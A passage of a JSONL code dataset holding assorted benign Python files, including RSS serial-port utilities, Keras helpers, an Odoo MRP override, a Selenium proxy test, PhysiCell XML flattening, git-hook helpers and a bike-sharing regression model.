print(data)\n\n","sub_path":"tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"461581326","text":"# This code was originally written by Neal Patwari in the SPAN Lab.\n\nimport sys\nimport platform\nimport glob\nimport numpy.ma as ma\nimport numpy as np\nimport serial\nimport time\nfrom struct import unpack\n\ndef parse_line(line):\n line_out = line.split(' ')\n tmp = np.array([float(item) for item in line_out])\n rss = tmp[:-1]\n time_stamp = tmp[-1]\n return rss, time_stamp\n\n\n# ########################################\n# Code to provide a fixed-length buffer data type\nclass FixedLenMaskedBuffer:\n def __init__(self, initlist, masked_value):\n self.frontInd = 0\n self.data = ma.masked_equal(initlist, masked_value)\n self.len = len(initlist)\n \n def list(self):\n oldest = self.frontInd+1\n return self.data[oldest:] + self.data[:oldest]\n \n # Append also deletes the oldest item\n def append(self, newItem):\n self.frontInd += 1\n if self.frontInd >= self.len:\n self.frontInd = 0\n self.data[self.frontInd] = newItem\n \n # Returns the \"front\" item\n def mostRecent(self):\n return self.data[self.frontInd]\n \n # Returns the N items most recently appended\n def mostRecentN(self,N):\n return [self.data[(self.frontInd-i)%self.len] for i in range(N-1,-1,-1)]\n \n # Returns the variance of the data\n def var(self):\n return np.var(self.data) \n# ######################################## \n\n# Convert Tx, Rx, and Ch numbers to link number\ndef linkNumForTxRxChLists(tx, rx, ch, nodeList, channelList):\n if (nodeList.count(tx) == 0) or (nodeList.count(rx) == 0) or (channelList.count(ch) == 0):\n sys.stderr.write('Error in linkNumForTxRx: tx, rx, or ch number invalid')\n rx_enum = nodeList.index(rx)\n tx_enum = nodeList.index(tx)\n ch_enum = channelList.index(ch)\n nodes = len(nodeList)\n links = nodes*(nodes-1)\n linknum = ch_enum*links + tx_enum*(nodes-1) + rx_enum\n if (rx_enum > tx_enum):\n linknum -= 1\n return linknum\n\n# Convert link number to Tx and Rx numbers\ndef txRxChForLinkNum(linknum, nodeList, channelList):\n nodes = len(nodeList)\n links = nodes*(nodes-1)\n ch_enum = linknum / links\n remLN = linknum % links\n tx_enum = remLN / (nodes-1)\n rx_enum = remLN % (nodes-1)\n if (rx_enum >= tx_enum):\n rx_enum+=1\n if (tx_enum >= nodes) | (ch_enum > len(channelList)):\n sys.stderr.write('Error in txRxForLinkNum: linknum or ch too high for nodes, channels values')\n else:\n ch = channelList[ch_enum]\n tx = nodeList[tx_enum]\n rx = nodeList[rx_enum]\n return (tx, rx, ch)\n\n\n\ndef hex2signedint(he):\n # Convert from hexidecimal 2's complement to signed 8 bit integer\n return (int(he,16) + 2**7) % 2**8 - 2**7\n\ndef prevChannel(channelList, ch_now):\n if (channelList.count(ch_now) > 0):\n i = channelList.index(ch_now)\n rval = channelList[(i-1) % len(channelList)]\n else:\n rval = -1 # Key for bad ch_now input\n return rval\n\n# USER: The following serial \"file name\" changes depending on your operating\n# system, and what name is assigned to the serial port when your listen\n# node is plugged in.\ndef serialFileName(): \n system_name = platform.system()\n #\n # LINUX USERS\n if system_name == 'Linux':\n # Automatically grab the USB filename (since the number after /dev/ttyACM may vary)\n usb_file_list = glob.glob('/dev/ttyACM*')\n if len(usb_file_list) > 0:\n serial_filename = usb_file_list[0] \n else:\n sys.stderr.write('Error: No Listen node plugged in?\\n')\n serial_filename = '0'\n #\n # WINDOWS USERS: Change 'COM#' to match what the system calls your USB port.\n elif system_name == 'Windows':\n serial_filename = 'COM3'\n #\n # MAC USERS\n else: # 'Darwin' indicates MAC OS X\n # Automatically grab the USB filename (since the number after /dev/tty.usb may vary)\n usb_file_list = glob.glob('/dev/tty.usb*')\n if len(usb_file_list) > 0:\n serial_filename = usb_file_list[0] \n else:\n sys.stderr.write('Error: No Listen node plugged in?\\n')\n #\n# return '/dev/tty.usbmodem411'\n# return '/dev/tty.usbmodem621'\n# return '/dev/ttyACM0'\n return serial_filename\n\n\n \n","sub_path":"rss.py","file_name":"rss.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"539126368","text":"\"\"\"\nfunctions in the file are all common utils that other module need\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport os\nimport shutil\nimport matplotlib.pyplot as plt\nfrom keras.utils.vis_utils import plot_model, model_to_dot #newer\n#from keras.utils.visualize_util import plot, model_to_dot\nfrom IPython.display import Image, SVG\n\ndef readCategories(fileName=\"./categories.txt\"):\n \"\"\"\n # Description: read all category indexes and names from disk file.\n # Arguments\n fileName: the file which categories are saved in\n # Returns\n dict of categories: {index:{'name':value}}\n # Raises\n None\n \"\"\"\n categories = {}\n dfCategories = pd.read_csv(fileName)\n print(dfCategories.shape)\n categories = dfCategories.set_index('index').T.to_dict(\"dict\")\n return categories\n\n\ndef readLabels(fileName=\"./train.csv\"):\n \"\"\"\n # Description: read labels for the samples.\n # Arguments\n fileName: the file which label are saved in\n # Returns\n list of sample id and label list: [{'id':, 'targetList':[]}]\n # Raises\n None\n \"\"\"\n labels = {}\n dfLabels = pd.read_csv(fileName)\n dfLabels['targetList'] = dfLabels.Target.str.split(' ')\n dfLabels.drop('Target',axis=1, inplace=True)\n print(dfLabels.head())\n labels = dfLabels.to_dict(\"recods\")\n return labels\n\n\ndef rebuildDir(dir):\n if os.path.exists(dir):\n shutil.rmtree(dir)\n os.makedirs(dir)\n \n \n# visualize model\ndef visualizeModel(model, modelName=None):\n if model == None or modelName == None:\n raise Exception(\"in save_model, invalid parameter\") \n imageName = modelName + \".png\"\n plot_model(model, to_file=imageName, show_shapes=True) #newer\n #plot(model, to_file=image_name, show_shapes=True)\n SVG(model_to_dot(model).create(prog='dot', format='svg'))\n \ndef visualizeHistory(history, modelName=None):\n if modelName == None:\n raise Exception(\"in visualize_history, please input your model_name\")\n print(history.history.keys())\n plt.figure(figsize=(12,4))\n plt.subplot(1, 2,1)\n \n # summarize history for accuracy\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title(modelName + ' model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'valid'], loc='center right')\n plt.subplots_adjust(wspace = .5)\n \n # summarize history for loss\n plt.subplot(1, 2, 2)\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title(modelName + ' model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'valid'], loc='center right')\n \n plt.show()\n \n#import h5py as h5py\ntry:\n import h5py\nexcept ImportError:\n h5py = None\ndef saveModel(model, modelName):\n if model == None or modelName == None:\n raise Exception(\"in save_model, invalid parameter\")\n #model.save_weights(modelName + '.h5')\n with open(modelName + '.json', 'w') as f:\n f.write(model.to_json())","sub_path":"kaggle/Human Protein Atlas Image Classification/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"172631154","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\nclass OLA_MRP_MrpProductions(models.Model):\n _inherit = \"mrp.production\"\n #mrp.production\n \n @api.multi\n def action_actializar(self):\n self.move_raw_ids = False\n self._generate_moves()\n self.action_eliminar_stock_move()\n return True\n\n @api.multi\n def action_eliminar_stock_move(self):\n id = self.ids[0]\n ids = self.env[\"stock.move\"].search(['&','&','&','&',\n ('origin','=',self.name),\n ('product_id','!=',self.product_id.ids[0]),\n ('production_id','not in',(id,)),\n ('raw_material_production_id','not in',(id,)),\n ('state','=','confirmed'),\n ])#.unlink() production_id\n for move in ids:\n move.action_cancel()\n\n ids = self.env[\"stock.move\"].search(['&','&','&','&',\n ('origin','=',self.name),\n ('product_id','=',self.product_id.ids[0]),\n ('production_id','=',id),\n ('raw_material_production_id','not in',(id,)),\n ('state','=','confirmed'),\n ],\n order=\"id desc\")\n\n if len(ids) > 1:\n conteo = 1\n while len(ids) > conteo:\n #ids[conteo].action_cancel()\n ids[conteo]._action_cancel()\n conteo += 1\n\n #ids = self.env[\"stock.move\"].search([('origin','=',self.name)])\n #id = 1\n\n #@api.onchange('bom_id')\n #def onchange_bom_id(self):\n # self.action_actializar()\n\n \n @api.multi \n def write(self, vals):\n res = super(OLA_MRP_MrpProductions, self).write(vals)\n if 'bom_id' in vals:\n self.action_actializar()\n return res\n\n\nOLA_MRP_MrpProductions()","sub_path":"OLA_MRP/models_herencia/OLA_MRP_MrpProductions.py","file_name":"OLA_MRP_MrpProductions.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"573604555","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#########################################################################\n# Author: zioer\n# mail: xiaoyu0720@gmail.com\n# Created Time: 2020年07月18日 星期六 20时04分41秒\n#########################################################################\nimport time\nimport requests as req\nfrom selenium import webdriver\nfrom selenium.webdriver.common.proxy import Proxy, ProxyType\n\n\nPROXY = req.get('http://localhost:5030/get').json()['proxy']\n\nprint(PROXY)\n\nproxy = Proxy()\nproxy.http_proxy = PROXY\nproxy.ssl_proxy = PROXY\n\ncapabilities = webdriver.DesiredCapabilities.FIREFOX\nproxy.add_to_capabilities(capabilities)\n\nwith webdriver.Firefox(desired_capabilities=capabilities) as driver:\n driver.get(\"https://httpbin.org/ip\")\n print(driver.title)\n time.sleep(5)\n","sub_path":"selenium/test_proxy_firefox1.py","file_name":"test_proxy_firefox1.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"494043390","text":"from GeradorDeAnuncios.CriadorDeAnunciosMagento.ExportarPlanilha.ExportarCsv import ExportarCsv\nfrom GeradorDeAnuncios.CriadorDeAnunciosMagento.ExportarPlanilha.ExportarXlsx import ExportarXlsx\nfrom GeradorDeAnuncios.CriadorDeAnunciosMagento.UtilidadesGerais.Tratamento import Tratamento\n\n\nclass ExportarPlanilha:\n\n def __init__(self, planilha, caminho, sku='', tipo='print'):\n self._tipo = tipo\n self._planilha = self.__retiraDadosPlanilha(planilha)\n self._nomeArq = caminho\n self.__sku = sku\n \"\"\"\n caso não preencher a sku nao sera atualizado os codigos nos Json de SAP\n \"\"\"\n\n def __retiraDadosPlanilha(self, planilha):\n planilhaTratada = []\n for dic in planilha:\n del (dic['adicional_infos'])\n del (dic['prefixo'])\n del (dic['atributos'])\n del (dic['split'])\n del (dic['tipoSku'])\n try:\n url = dic['name_mktplace'].replace(' ', '-') + '-' + dic['sku'].replace('0', '').lower()\n url = Tratamento().retiraAcentos(url.lower())\n dic['url_key'] = url\n except:\n raise ValueError(\"Não foi possivel criar url\")\n planilhaTratada.append(dic)\n return planilhaTratada\n\n def __trataNomeArq(self):\n nomeArq = self._nomeArq.split('/')[-1]\n nomeArq = nomeArq.lower().replace('.csv', '').replace('.xlsx', '')\n return '/home/bertho/Documents/exp/' + nomeArq\n\n def exportar(self):\n if self._tipo == 'csv':\n exportCsv = ExportarCsv(self._planilha, self.__trataNomeArq())\n self.__sku.salvaSku()\n print()\n return exportCsv.exportar()\n elif self._tipo == 'print':\n # self.__sku.salvaSku()\n print()\n for item in self._planilha:\n print(item)\n print(f'\\nTotal de {len(self._planilha) + 1} linhas.')\n elif self._tipo == 'leitura':\n exportarXlsx = ExportarXlsx(self._planilha, self.__trataNomeArq())\n return exportarXlsx.exportar()\n else:\n raise ValueError(f'{self._tipo} nao sei oque fazer')\n","sub_path":"GeradorDeAnuncios/CriadorDeAnunciosMagento/ExportarPlanilha/ExportarPlanilha.py","file_name":"ExportarPlanilha.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156893676","text":"import json\nimport re\n\nimport csv\nimport os\nfrom tools.common.misc import abs_path\n\ndef read_json_config_file(file_name):\n required_fields_dict = get_fieldlist_from_json_file(file_name)\n return required_fields_dict\n\n\ndef get_file_ext(file_name_and_path):\n pattern_in = r'(.*)\\/([\\w|-]*)\\.(\\w+)$'\n\n groups = None\n iter = (re.finditer(pattern_in, file_name_and_path))\n for match in iter:\n groups = match.groups()\n return (groups[0], groups[1], groups[2])\n\ndef write_dictionary_into_json_file(file_path, file_name, dict_content):\n\n for k in dict_content:\n v = dict_content[k]\n if isinstance(v, str) == False:\n v_as_str = str(v)\n dict_content[k] = v_as_str\n pass\n\n if not os.path.exists(file_path):\n os.makedirs(file_path)\n\n full_path = os.path.join(file_path, file_name)\n\n with open(full_path, 'w') as fp:\n # json.dump(dict_content, fp, indent=2, ensure_ascii=True )\n fp.write(json.dumps(dict_content, indent=2, ensure_ascii=True))\n\ndef write_dictionary_into_csv_file(file, dict_list):\n if len(dict_list) == 0:\n return None\n with open(abs_path(file), 'w') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=dict_list[0].keys())\n writer.writeheader()\n for dict in dict_list:\n writer.writerow(dict)\n return len(dict_list)\n\ndef get_dictionarylist_operators_from_csv_file(file_in):\n\n def fn_get_primary_dicts():\n return _dict_list\n\n def fn_get_filtered_dicts(dict_list, field_names):\n fn_filter_dict = lambda dict : {k: dict[k] for k in field_names if k in dict.keys()}\n filtered_dicts = list(map(fn_filter_dict, dict_list))\n return filtered_dicts\n\n if os.path.isfile(file_in) == False:\n raise Exception(\"FILE {} does not exit\".format(file_in))\n\n _dict_list = []\n with open(file_in) as csvDataFile:\n csvReader = csv.DictReader(csvDataFile)\n for row in csvReader:\n row_dict = {}\n\n for k,v in row.items():\n row_dict[k] = v\n _dict_list.append(row_dict)\n return (fn_get_primary_dicts, fn_get_filtered_dicts)\n\ndef get_json_operation_functions(file_name):\n def fn_get_dictionary():\n return _dict\n\n def fn_get_field_list():\n field_list = set(_dict)\n return field_list\n\n _dict = {}\n\n with open(file_name, 'r') as json_data:\n _dict = json.load(json_data)\n\n\n return (fn_get_dictionary, fn_get_field_list)\n\ndef get_dictionary_from_json_file(file_path):\n fn_get_dictionary, _ = get_json_operation_functions(file_path)\n d = fn_get_dictionary()\n return d\n\ndef get_fieldlist_from_json_file(file_path):\n _, fn_get_field_list = get_json_operation_functions(file_path)\n fields = fn_get_field_list()\n return fields\n\ndef read_lines_from_text_file(file_name):\n with open(file_name, 'r', encoding='utf-8') as infile:\n lines =[]\n for line in infile.readlines():\n\n lines.append(line)\n return lines\n\n\n","sub_path":"tools/common/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"633972810","text":"# from flask import Flask\nimport sounddevice as sd\nimport librosa\n\n# app = Flask(__name__)\n \n# @app.route(\"/\")\ndef main():\n name = input(\"Enter name of song:\")\n fs = 44100\n sd.default.samplerate = fs\n sd.default.channels = 2\n duration = 9\n rec = sd.rec(int(duration * fs), dtype='float64')\n sd.wait()\n librosa.output.write_wav(name+\"Hum.wav\", rec, fs)\n print(\"Done.\")\n \n# if __name__ == \"__main__\":\n# app.run()\n\nmain()\n\n\n","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"603858661","text":"# flatten_cell_def_xml.py - convert a PhysiCell_settings.xml with inheritance of \n# into one without inheritance, i.e., verbose leaf s.\n#\n#\n# Author: Randy Heiland\n#\n\nimport xml.etree.ElementTree as ET\nimport sys\nimport string\n\nxml_file = \"PhysiCell_settings.xml\"\nargc = len(sys.argv)\nprint('argc=',argc)\nif argc == 2:\n xml_file = sys.argv[1]\nelif argc > 2:\n print('Error: too many args. Only 1 allowd (optional): [.xml config file]')\n#print('argv=',sys.argv)\n\n\"\"\"\nFor example:\n\t\n\t\t\n\t\t\t0\n\t\t\t42\n\t\t\t43\n\t\t\t\n\t\t\t\tA \n\t\t\t\n\t\t\n\t\t\n\t\t\t1\n\t\t\t\n\t\t\t\tA1 \n\t\t\t\n\t\t\n\"\"\"\n\n#--------------------------------------------------\nprint(\"\\n--- Phase 0: Build a Python dict, cell_def, that contains keys = name and values = {'ID':value, 'parent':value}\" )\n\ntree = ET.parse(xml_file) \nxml_root = tree.getroot()\n\n# \"cell_def\" will be a dict with key = cell_def name, value = {'ID':value, 'parent':value}\ncell_defs_dict = {}\ncell_defs = tree.find('cell_definitions')\nprint('cell_defs =',cell_defs)\nfor cd in list(cell_defs):\n print(cd.attrib)\n attrib_dict = {}\n attrib_dict['ID'] = cd.attrib['ID']\n if 'parent_type' in cd.attrib.keys():\n attrib_dict['parent'] = cd.attrib['parent_type']\n else:\n attrib_dict['parent'] = None\n cell_defs_dict[cd.attrib['name']] = attrib_dict\n\n # if (cell_defs_dict.attrib['name'] != 'default') and ('parent_type' in cell_defs_dict.attrib.keys() ): # and ('immune' in cell_defs_dict.attrib['parent_type'] ) :\n# if (cell_defs_dict.attrib['name'] != 'default') and (cell_defs_dict.attrib['name'] != 'immune') and ('parent_type' in cell_defs_dict.attrib.keys() ): # and ('immune' in cell_defs_dict.attrib['parent_type'] ) :\n# leaf_cell_defs[cell_defs_dict.attrib['name']] = cell_defs_dict.attrib['ID']\n \n#print('leaf_cell_defs= ',leaf_cell_defs) \nprint('cell_defs_dict= ',cell_defs_dict) \n\n#leaf_immune_cell_defs = [\"CD8 Tcell\", \"macrophage\", \"neutrophil\", \"DC\", \"CD4 Tcell\", \"fibroblasts\"]\n# leaf_immune_cell_defs = list(leaf_cell_defs.keys())\n# leaf_immune_cell_defs.remove('lung epithelium')\n# print('leaf_immune_cell_defs= ',leaf_immune_cell_defs) \n\nxml_root = tree.getroot()\n#--------------------------------------------------\nprint(\"\\n--- Phase 1: create a new .xml containing N copies of 'default' cell_definition, with desired names.\")\n\n#tree0 = tree\n#flat_root = xml_root\n# default_cell_def = xml_root.find(\"cell_definitions//cell_definition[@name='default']\")\ncell_defs = tree.find('cell_definitions')\n# root_node = cell_defs.getroot()\n#--------------------------------------------------\nprint(\"--- Remove all but root node (top cell_def)\")\n# May NOT be called \"default\", e.g.\n# cancer_biorobots: \n# Assuming root node is the first one.\nroot_node = True\nfor cd in list(cell_defs):\n # print(cell_def.tag, cell_defs_dict.attrib['name'])\n if (root_node):\n root_node = False\n else:\n print(\"removing \", cd.attrib['name'])\n cell_defs.remove(cd)\n # ET.SubElement(root_node,default_cell_def)\n # cell_defs.insert(0,default_cell_def)\n\n# new_xml_file = \"new_flat_config1.xml\"\n# new_xml_file = \"flat.xml\"\n# tree.write(new_xml_file)\n#sys.exit()\n\n#--------------------------------------------------\n# tree = ET.parse(\"new_flat_config1.xml\") \n# xml_root = tree.getroot()\n# For each child of the root node, make a copy of the root.\n\n#default_cell_def = xml_root.find(\"cell_definitions//cell_definition[@name='default']\")\n# NB: Assume the root will be the first one\nroot_cell_def = xml_root.find(\"cell_definitions//cell_definition\")\nroot_name = root_cell_def.attrib['name'] \nprint(\"--- Insert duplicate root cell_def for of its children\")\nprint(\" root_name = \",root_name)\ncd_vals = list(cell_defs_dict.values())\nprint(cd_vals)\n\nfor cd in cd_vals:\n # print('-- ',leaf)\n# print(cell_def.tag, cell_defs_dict.attrib['name'])\n # print(\"insert default for \", leaf.attrib['name'])\n # print(\"insert default for \", leaf)\n # default_cell_def.attrib['name'] = leaf\n # tmp_cd.attrib['name'] = leaf\n # cell_defs.insert(0,default_cell_def)\n\n # cell_defs.insert(0,default_cell_def)\n\n # if cd['parent'] == root_name: # handles just the children of root (not grandchildren, etc)\n if cd['parent']: # handles just the children of root (not grandchildren, etc)\n print('inserting child of ',root_name)\n cell_defs.insert(0,root_cell_def)\n # root_cell_def.attrib['name'] = 'bar'\n # child = xml_root.find(\"cell_definitions//cell_definition[2]\")\n # child.attrib['name'] = 'foo'\n#sys.exit()\n\n# NB! Need to save the file at this point and read it back in to continue processing.\nnew_xml_file = \"tmp1.xml\"\ntree.write(new_xml_file)\n\n#--------------------------------------------\ntree = ET.parse(\"tmp1.xml\") \nxml_root = tree.getroot()\nidx = 1\ncd_keys = list(cell_defs_dict.keys())\nfor cd in cd_vals:\n # if cd['parent'] == root_name: # handles just the children of root (not grandchildren, etc)\n if cd['parent']:\n # if cd.values()['parent'] == root_name:\n new_name = cd_keys[idx]\n new_ID = cd['ID']\n idx += 1\n # new_name = 'bar' + str(idx)\n print('renaming child of ',root_name,' to be ',new_name, 'with ID ',new_ID)\n xml_root.find(\"cell_definitions//cell_definition[\" +str(idx) + \"]\").attrib['name'] = new_name\n xml_root.find(\"cell_definitions//cell_definition[\" +str(idx) + \"]\").attrib['ID'] = new_ID\n # break\n # print(xml_root.find(\"cell_definitions//cell_definition[\" + str(idx) + \"]\"))\n\nnew_xml_file = \"tmp2.xml\"\n# new_xml_file = \"flat.xml\"\nprint(\"---> \",new_xml_file)\ntree.write(new_xml_file)\n\nsys.exit()\n#--------------------------------------------------\n# tree = ET.parse(\"new_flat_config1.xml\") \n# cell_defs = tree.find('cell_definitions')\n# xml_root = tree.getroot()\n\n# print(\"--- Change cell_def name for *each* leaf\")\n# idx = -1\n# leaf_name = list(leaf_cell_defs.keys())\n# for cell_def in list(cell_defs):\n# if idx >= 0:\n# cell_def.attrib['name'] = leaf_name[idx]\n# cell_def.attrib['ID'] = leaf_cell_defs[leaf_name[idx]]\n# cell_def.set(\"parent\",\"default\") # insert parent = \"default\" attribute\n\n# print(cell_def.attrib['name'])\n# idx += 1\n\n# new_xml_file = \"new_flat_config1.xml\"\n# tree.write(new_xml_file)\n# print(\"\\nDone. Please check the output file: \" + new_xml_file + \"\\n\")\n\n#--------------------------------------------------\n# We want to replace all the XML elements and attributes in the (copied) parent's with the\n# newly defined values provided by its children.\n#\nprint(\"\\n===================================================================================\")\nprint(\"--- Phase 2: update all children's elements and attributes.\")\n\n\"\"\"\nfor example:\n \t\t\n\t\t\t1\n\t\t\t\n\t\t\t\tA1 \n\t\t\t\n\"\"\"\n\ntree_flat = ET.parse(\"tmp2.xml\") \nxml_flat_root = tree_flat.getroot()\n\nsys.exit()\n\n#------------------------------------------------------------\n\nidx = -1\n# tree_orig = ET.parse(\"PhysiCell_settings.xml\") \ntree_orig = ET.parse(xml_file) \n# tree = ET.parse(\"new_flat_config1.xml\") \nxml_orig = tree_orig.getroot()\nuep = None\n# for requested cell_def param values in the original (inheritance) XML, copy them into the new (flattened) XML\nfor cd in xml_orig.findall('cell_definitions//cell_definition'):\n idx += 1\n if cd.attrib[\"name\"] == \"immune\": # we only want the \"immune\" cell def\n uep = cd\n print(\"---------------- processing immune cell_def at idx= \",idx) # 2 (0=default, 1=lung epi)\n # immune_uep = root.find('.//cell_definitions')\n for child in cd:\n if child.tag != 'custom_data':\n print(\"------- calling recurse_node on child=\",child)\n recurse_node(child,\"\",\"\") # should only call with child=, then recursively calls its children\nprint(\"\\nDone.\")\n\nnew_xml_file = \"new_flat_config2.xml\"\ntree_flat.write(new_xml_file)\nprint(\"\\nDone. Please check the output file: \" + new_xml_file + \"\\n\")\n\nsys.exit()\n#--------------------------------------------------\nprint(\"\\n===================================================================================\")\nprint(\"--- Phase 3: edit the new .xml so each immune cell type has its specific params (from the ORIGINAL .xml).\")\n\ntree_orig = ET.parse(\"PhysiCell_settings.xml\") \nxml_orig = tree_orig.getroot()\n\ntree_flat = ET.parse(\"new_flat_config2.xml\") \n# tree_flat = ET.parse(new_xml_file) \nxml_flat_root = tree_flat.getroot() # we'll update xml_flat_root (and write to a new output file)\n\ndef update_this_immune_cell_def_params(xmlpath, save_param_val, cell_def_name):\n# for cell_def in immune_cell_defs:\n for cd in xml_flat_root.findall('cell_definitions//cell_definition'): # find *this* cell_def in flattened XML\n if cd.attrib['name'] == cell_def_name:\n if len(xmlpath) > 13: # i.e., not equal to just \"//custom_data\" (with no param name)\n print('-- update ',cell_def_name, ', xmlpath=',xmlpath, \" = \",save_param_val)\n cd.find('.'+xmlpath).text = save_param_val\n\ndef recurse_node2(root,xmlpath, cell_def_name):\n global save_param_val\n xmlpath = xmlpath + \"//\" + root.tag[root.tag.rfind('}')+1:]\n param_val = ''\n for child in root:\n if child.text == None:\n print(\">>>> \", child, \".text is None\")\n continue\n param_val = ' '.join(child.text.split())\n if param_val != '':\n # print('param value=',param_val, ' for ',end='')\n save_param_val = param_val\n recurse_node2(child,xmlpath,cell_def_name)\n if len(list(root)) == 0:\n # print(xmlpath)\n print(xmlpath,' = ',save_param_val)\n update_this_immune_cell_def_params(xmlpath, save_param_val, cell_def_name)\n save_param_val = None\n\n\n#leaf_immune_cell_defs = [\"CD8 Tcell\", \"macrophage\", \"neutrophil\", \"DC\", \"CD4 Tcell\"]\nfor cd in xml_orig.findall('cell_definitions//cell_definition'):\n idx += 1\n if cd.attrib[\"name\"] in leaf_immune_cell_defs:\n uep = cd\n print(\"\\n---------------- processing \",cd.attrib[\"name\"]) # 2 (0=default, 1=lung epi)\n # immune_uep = root.find('.//cell_definitions')\n for child in cd:\n print(\"------- calling recurse_node2 on child=\",child)\n recurse_node2(child,\"\",cd.attrib[\"name\"])\n\nprint(\"\\nDone.\")\n\n#new_xml_file = \"new_flat_config3.xml\"\nnew_xml_file = \"flat.xml\"\ntree_flat.write(new_xml_file)\n\nwith open(new_xml_file, 'r+') as f:\n new_xml = f.read()\n f.seek(0, 0)\n f.write('' + '\\n' + new_xml)\n\nprint(\"---> wrote \",new_xml_file, \"(copy it to PhysiCell_settings.xml if desirable)\\n\")","sub_path":"qt_for_python/gui4xml/pyqt5_version/config_samples/flatten_cell_def_xml-huh.py","file_name":"flatten_cell_def_xml-huh.py","file_ext":"py","file_size_in_byte":11077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"215639281","text":"from django.test import TestCase, Client\n\nclass ViewTests(TestCase):\n \"\"\"\n Tests if the index page exists and returns 200\n \"\"\"\n def test_if_index_page_status_code_is_200(self):\n client = Client()\n response = client.get('/')\n\n self.assertEqual(response.status_code, 200)\n\n def test_if_categories_page_status_code_is_200(self):\n client = Client()\n response = client.get('/categories/');\n\n self.assertEqual(response.status_code, 200)\n \n","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"634325486","text":"#-*- coding:utf-8 -*-\nfrom os import system\nfrom sh import awk, grep, cat\n\ndef get_commit_files(file_type):\n system(\"git diff --cached --name-status > /tmp/git_hook\")\n\n files = awk(\n grep(\n cat(\"/tmp/git_hook\"), \"-P\", \"A|M.*.%s$\" % file_type,\n _ok_code = [0, 1]\n ), \"{print $2}\", _iter = True\n )\n\n exten = \".%s\" % file_type\n return [path[:path.rindex(exten) + len(exten)] for path in files]\n","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"537755625","text":"import math\nimport numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.metrics import mean_squared_error\n\nif __name__ == '__main__':\n train_data = pd.read_csv('train.csv',skipinitialspace=1,index_col=0,parse_dates=True)\n test_data = pd.read_csv('test.csv',skipinitialspace=1,index_col=0,parse_dates=True)\n \n # adding year/month/day/hour as feature\n train_data['hour']=train_data.index.hour\n test_data['hour']=test_data.index.hour\n train_data['month']=train_data.index.month\n test_data['month']=test_data.index.month\n train_data['day']=train_data.index.day\n test_data['day']=test_data.index.day\n train_data['year']=train_data.index.year\n test_data['year']=test_data.index.year\n\n # add a column of time difference\n train_data['time'] = train_data.index\n test_data['time'] = test_data.index\n train_data['timeSince']=train_data.time-train_data.time[0]\n test_data['timeSince']=test_data.time-test_data.time[0]\n train_data['timeSince']=train_data['timeSince'].apply(lambda x: x / np.timedelta64(1,'D'))\n test_data['timeSince']=test_data['timeSince'].apply(lambda x: x / np.timedelta64(1,'D'))\n\n\n # transform target into log\n for col in ['casual', 'registered', 'count']:\n train_data['log-' + col] = train_data[col].apply(lambda x: math.log(1 + x))\n \n\n \n # selected column names\n selected_cols = [u'season', u'holiday', u'workingday', u'weather', u'temp', u'atemp',u'humidity', u'windspeed',u'hour',u'month',u'year',u'timeSince']\n \n params = {'n_estimators': 300, 'max_depth': 10, 'min_samples_split': 1,'learning_rate': 0.05, 'loss': 'ls'}\n\n clf_cas = GradientBoostingRegressor(**params)\n clf_reg = GradientBoostingRegressor(**params)\n\n clf_cas.fit(train_data[selected_cols], train_data['log-casual'])\n clf_reg.fit(train_data[selected_cols], train_data['log-registered'])\n \n train_data['prediction_cas'] = clf_cas.predict(train_data[selected_cols])\n train_data['prediction_reg'] = clf_reg.predict(train_data[selected_cols])\n train_data['prediction'] = train_data['prediction_cas'].apply(lambda x: math.exp(x)-1) + train_data['prediction_reg'].apply(lambda x: math.exp(x)-1)\n\n# round to closest integer\n train_data['prediction'].apply(round)\n train_data['prediction'].apply(lambda x: x if x>0 else 0)\n \n mse = mean_squared_error(train_data['count'], train_data['prediction'])\n print(\"MSE: %.4f\" % mse)\n \n test_data['prediction_cas'] = clf_cas.predict(test_data[selected_cols])\n test_data['prediction_reg'] = clf_reg.predict(test_data[selected_cols])\n test_data['prediction'] = test_data['prediction_cas'].apply(lambda x: math.exp(x)-1) + test_data['prediction_reg'].apply(lambda x: math.exp(x)-1)\n \n \n test_data['prediction'].apply(round)\n test_data['prediction'].apply(lambda x: x if x>0 else 0)\n \n test_data['prediction'].to_csv('output.csv',header=['count']) 